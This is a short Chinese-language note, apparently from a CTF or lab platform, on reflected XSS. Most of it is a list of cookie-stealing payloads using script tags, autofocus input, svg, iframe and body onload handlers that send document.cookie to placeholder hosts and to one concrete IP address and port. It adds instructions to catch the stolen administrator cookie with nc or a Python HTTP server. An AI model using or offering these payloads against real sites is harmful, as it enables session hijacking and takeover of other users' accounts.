反射型xss
需要传入payload,可以发现script语句已经嵌入到了页面中,触发弹窗:(自己插自己
paload:
<script>window.open('http://ip:port/'+document.cookie)</script><script>window.location.href='http://ip:port/'+document.cookie</script><script>location.href='http://116.62.127.33:8888/'+document.cookie</script><input onfocus="window.open('http://ip:port/'+document.cookie)" autofocus><svg onload="window.open('http://ip:port/'+document.cookie)"><iframe onload="window.open('http://ip:port/'+document.cookie)"></iframe><body onload="window.open('http://ip:port/'+document.cookie)">
之后nc 开一个端口来接受cookie就可以了,这里为啥会是管理员的cookie,好像是平台有跳转时就会有机器人管理员访问,或者直接python3 -m http.server 8888 开一个服务也行
若有收获,就点个赞吧
0 人点赞
